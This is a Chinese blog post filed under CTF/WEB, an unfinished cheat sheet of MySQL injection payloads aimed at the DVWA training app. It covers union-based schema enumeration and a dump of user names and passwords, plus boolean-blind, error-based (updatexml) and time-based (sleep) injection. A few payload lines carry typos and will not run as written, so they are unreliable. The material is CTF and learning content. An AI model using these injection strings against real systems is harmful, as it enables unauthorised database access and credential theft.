<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.2.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/32%C3%9732.ico">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/16%C3%9716.ico">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">
  <link rel="stylesheet" href="/lib/pace/pace-theme-barber-shop.min.css">
  <script src="/lib/pace/pace.min.js"></script>

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"dawnchen.design","root":"/","scheme":"Mist","version":"7.8.0","exturl":false,"sidebar":{"position":"left","width":300,"display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":true},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="sql注入">
<meta property="og:type" content="article">
<meta property="og:title" content="sql注入常见代码">
<meta property="og:url" content="https://dawnchen.design/2020/09/21/sql%E6%B3%A8%E5%85%A5%E5%B8%B8%E8%A7%81%E4%BB%A3%E7%A0%81/index.html">
<meta property="og:site_name" content="࿐梦ლ">
<meta property="og:description" content="sql注入">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2020-09-21T13:00:39.000Z">
<meta property="article:modified_time" content="2020-11-18T10:54:12.187Z">
<meta property="article:author" content="DawnChen">
<meta name="twitter:card" content="summary">

<link rel="canonical" href="https://dawnchen.design/2020/09/21/sql%E6%B3%A8%E5%85%A5%E5%B8%B8%E8%A7%81%E4%BB%A3%E7%A0%81/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>sql注入常见代码 | ࿐梦ლ</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">࿐梦ლ</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">或许是不知梦的缘故，流离之人追逐幻影</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-主页">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>主页</a>

  </li>
        <li class="menu-item menu-item-关于">

    <a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a>

  </li>
        <li class="menu-item menu-item-随笔">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>随笔</a>

  </li>
        <li class="menu-item menu-item-分类">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-归档">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://dawnchen.design/2020/09/21/sql%E6%B3%A8%E5%85%A5%E5%B8%B8%E8%A7%81%E4%BB%A3%E7%A0%81/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/head.jpg">
      <meta itemprop="name" content="DawnChen">
      <meta itemprop="description" content="斯人若彩虹，遇上方知有">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="࿐梦ლ">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          sql注入常见代码
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2020-09-21 21:00:39" itemprop="dateCreated datePublished" datetime="2020-09-21T21:00:39+08:00">2020-09-21</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2020-11-18 18:54:12" itemprop="dateModified" datetime="2020-11-18T18:54:12+08:00">2020-11-18</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/CTF/" itemprop="url" rel="index"><span itemprop="name">CTF</span></a>
                </span>
                  ，
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/CTF/WEB/" itemprop="url" rel="index"><span itemprop="name">WEB</span></a>
                </span>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p>sql注入</p>
<a id="more"></a>
<h3 id="常规注入（假设表中字段数为2）"><a href="#常规注入（假设表中字段数为2）" class="headerlink" title=" 常规注入（假设表中字段数为2）"></a><font color="#FF0000"> 常规注入（假设表中字段数为2）</font></h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">判断字段：order by 2</span><br><span class="line">Union联合查询:  union select 1,2  </span><br><span class="line">union select 1,(database()) ----数据库dvwa  </span><br><span class="line">union select 1,(select group_concat(table_name) from information_schema.columns where table_schema&#x3D;database()) ----表users,guestbook  </span><br><span class="line">union select 1,(select group_concat(column_name) from information_schema.columns where table_name&#x3D;’users’) ----字段 first_name,last_name,user,password  </span><br><span class="line">union select 1,(select group_concat(user,0x7e,password) from dvwa.users) ----查询出用户名与密码：admin、123456  </span><br></pre></td></tr></table></figure>

<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">------数据库information_schema中需要记住的表：</span><br><span class="line">① Schemata表（存储该用户所有数据库的库名）需要记住该表中记录数据库库名的字段名为schema_name</span><br><span class="line">② Tables表（存储该用户创建的所有数据库的库名和表名）需要记住该表中记录数据库库名和表名的宇段名分别为table_schema和table_name</span><br><span class="line">③ columns表（存储该用户创建的所有数据库的库名、表名和宇段名）需要记住该表中记录数据库库名、表名和宇段名的字段名为table_schema、table_name和column_name</span><br><span class="line"></span><br><span class="line">一般用columns表查询，columns表存储着该用户的数据库名、表名、字段名的字段</span><br><span class="line">输出数量有限制时用limit，select (user,,0x7e,password) from dvwa.users limit 0,1</span><br></pre></td></tr></table></figure>



<h3 id="盲注（无sql语句错误回显）"><a href="#盲注（无sql语句错误回显）" class="headerlink" title=" 盲注（无sql语句错误回显）"></a><font color="#FF0000"> 盲注（无sql语句错误回显）</font></h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">查询时只返回查询成功的值和失败的值，不会像union查询那样回显sql语句错误。例如分别查询1,2,3 分别换回 小明，小红，小刚。查询1’,2’,3’返回空值或其他提示（非sql语句错误之类的提示）</span><br><span class="line"></span><br><span class="line">盲注判断语句：</span><br><span class="line">① 1’ and length(database())&gt;&#x3D;1# ----判断数据库名是否大于1，如果大于1返回正常查询1的结果，反之返回其他</span><br><span class="line">② 1’ and substr(database(),1,1)&#x3D;”d”# ----substr是截取的意思，其意思是截取database()的值，从第一个字符开始，每次只返回一个值（substr(database(),2,1) 表示从第二个字符开始，每次只返回一个值）</span><br><span class="line">④ 1’ and ord(substr(database(),1,1))&#x3D;97# ----截取database()的第一个值并转化为ASCII码</span><br><span class="line">⑤ 1’ and ascii(substr(database(),1,1))&#x3D;97# ----截取database()的第一个值并转化为ASCII码（与④一样）</span><br></pre></td></tr></table></figure>



<h3 id="报错注入"><a href="#报错注入" class="headerlink" title=" 报错注入"></a><font color="#FF0000"> 报错注入</font></h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">程序直接将错误信息输出到了页面上（也可使用union注入），可以利用报错注入获取数据。报错注入有多种格式，此处利用函数updatexml（）演示SQL语句获取user（）的值</span><br><span class="line">Sql语句：1’ and updatexml(l,concat(0x7e,(select use()），θx7e),1)#</span><br></pre></td></tr></table></figure>




<h3 id="时间注入（时间盲注）"><a href="#时间注入（时间盲注）" class="headerlink" title=" 时间注入（时间盲注）"></a><font color="#FF0000"> 时间注入（时间盲注）</font></h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">构建错误sql查询语句时无返回查询失败的值，但是可以利用sleep()或benchmark（）等函数让MySQL的执行时间变长来进行sql注入</span><br><span class="line"></span><br><span class="line">时间盲注多与IF(expr1 ,expr2 ,expr3) 结合使用，此IF语句含义是：如果expr1是TRUE，则IF（）的返回值为expr2；否则返回值则为expr3。</span><br><span class="line">判断数据库库名长度的语句应为：</span><br><span class="line">① if(length(database())&gt;1,sleep(5),1) ----如果数据库库名的长度大于1，则MySQL查询休眠5秒，否则查询1</span><br><span class="line">② if(substr(database(),1, 1)&#x3D;’s’,sleep(5),1) ----如果数据库库名第一位是s，则MySQL查询休眠5秒，否则查询1</span><br></pre></td></tr></table></figure>

<h3 id="本文未完，博主正在加班加点编写中…"><a href="#本文未完，博主正在加班加点编写中…" class="headerlink" title="本文未完，博主正在加班加点编写中…"></a>本文未完，博主正在加班加点编写中…</h3>
    </div>

    
    
    
        

<div>
<ul class="post-copyright">
  <li class="post-copyright-author">
    <strong>本文作者： </strong>DawnChen
  </li>
  <li class="post-copyright-link">
    <strong>本文链接：</strong>
    <a href="https://dawnchen.design/2020/09/21/sql%E6%B3%A8%E5%85%A5%E5%B8%B8%E8%A7%81%E4%BB%A3%E7%A0%81/" title="sql注入常见代码">https://dawnchen.design/2020/09/21/sql注入常见代码/</a>
  </li>
  <li class="post-copyright-license">
    <strong>版权声明： </strong>本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" rel="noopener" target="_blank"><i class="fab fa-fw fa-creative-commons"></i>BY-NC-SA</a> 许可协议。转载请注明出处！
  </li>
</ul>
</div>


<div>
  
    <div>
    
        <div style="text-align:center;color: #ccc;font-size:14px;">-------------别瞅了<i class="fa icon-tags"></i>已经到底了！-------------</div>
    
</div>
  
</div>

      <footer class="post-footer">

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2020/09/21/CTF%E9%9D%B6%E5%9C%BA%E5%90%88%E9%9B%86/" rel="prev" title="CTF练习平台">
      <i class="fa fa-chevron-left"></i> CTF练习平台
    </a></div>
      <div class="post-nav-item">
    <a href="/2020/10/05/CG-CTF-x00/" rel="next" title="CG-CTF/x00">
      CG-CTF/x00 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">
	
      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%B8%B8%E8%A7%84%E6%B3%A8%E5%85%A5%EF%BC%88%E5%81%87%E8%AE%BE%E8%A1%A8%E4%B8%AD%E5%AD%97%E6%AE%B5%E6%95%B0%E4%B8%BA2%EF%BC%89"><span class="nav-number">1.</span> <span class="nav-text"> 常规注入（假设表中字段数为2）</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%9B%B2%E6%B3%A8%EF%BC%88%E6%97%A0sql%E8%AF%AD%E5%8F%A5%E9%94%99%E8%AF%AF%E5%9B%9E%E6%98%BE%EF%BC%89"><span class="nav-number">2.</span> <span class="nav-text"> 盲注（无sql语句错误回显）</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5"><span class="nav-number">3.</span> <span class="nav-text"> 报错注入</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%97%B6%E9%97%B4%E6%B3%A8%E5%85%A5%EF%BC%88%E6%97%B6%E9%97%B4%E7%9B%B2%E6%B3%A8%EF%BC%89"><span class="nav-number">4.</span> <span class="nav-text"> 时间注入（时间盲注）</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%9C%AC%E6%96%87%E6%9C%AA%E5%AE%8C%EF%BC%8C%E5%8D%9A%E4%B8%BB%E6%AD%A3%E5%9C%A8%E5%8A%A0%E7%8F%AD%E5%8A%A0%E7%82%B9%E7%BC%96%E5%86%99%E4%B8%AD%E2%80%A6"><span class="nav-number">5.</span> <span class="nav-text">本文未完，博主正在加班加点编写中…</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="DawnChen"
      src="/images/head.jpg">
  <p class="site-author-name" itemprop="name">DawnChen</p>
  <div class="site-description" itemprop="description">斯人若彩虹，遇上方知有</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives">
          <span class="site-state-item-count">5</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
        <span class="site-state-item-count">2</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
  </nav>
</div>


  <div class="links-of-blogroll motion-element">
    <div class="links-of-blogroll-title"><i class="fa fa-globe fa-fw"></i>
      My son's blog
    </div>
    <ul class="links-of-blogroll-list">
        <li class="links-of-blogroll-item">
          <a href="https://wangqi0908.tpddns.cn:4000/" title="https:&#x2F;&#x2F;wangqi0908.tpddns.cn:4000" rel="noopener" target="_blank">Wangson</a>
        </li>
    </ul>
  </div>

      </div>
	  
	  
	<div id="music163player">
		<iframe frameborder="no" border="0" marginwidth="0" marginheight="0" width=300 height=450 src="//music.163.com/outchain/player?type=0&id=5340000657&auto=0&height=430">
		</iframe>
	</div>


    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">DawnChen</span>
</div>

<!-- 网站运行时间的设置 -->
<span id="timeDate">载入天数...</span>
<span id="times">载入时分秒...</span>  Sometimes your whole life boils down to one insame move.
<script>
    var now = new Date();
    function createtime() {
        var grt= new Date("09/18/2020 18:00:00");//此处修改你的建站时间或者网站上线时间
        now.setTime(now.getTime()+250);
        days = (now - grt ) / 1000 / 60 / 60 / 24; dnum = Math.floor(days);
        hours = (now - grt ) / 1000 / 60 / 60 - (24 * dnum); hnum = Math.floor(hours);
        if(String(hnum).length ==1 ){hnum = "0" + hnum;} minutes = (now - grt ) / 1000 /60 - (24 * 60 * dnum) - (60 * hnum);
        mnum = Math.floor(minutes); if(String(mnum).length ==1 ){mnum = "0" + mnum;}
        seconds = (now - grt ) / 1000 - (24 * 60 * 60 * dnum) - (60 * 60 * hnum) - (60 * mnum);
        snum = Math.round(seconds); if(String(snum).length ==1 ){snum = "0" + snum;}
        document.getElementById("timeDate").innerHTML = "本站已安全运行 "+dnum+" 天 ";
        document.getElementById("times").innerHTML = hnum + " 小时 " + mnum + " 分 " + snum + " 秒";
    }
setInterval("createtime()",250);
</script>
        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/muse.js"></script>


<script src="/js/next-boot.js"></script>




  




  
<script src="/js/local-search.js"></script>













  

  

<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","tagMode":false,"model":{"jsonPath":"/live2dw/assets/hijiki.model.json"},"display":{"position":"right","width":150,"height":300},"mobile":{"show":false},"log":false});</script></body>
</html>

<!-- 页面点击小红心 -->
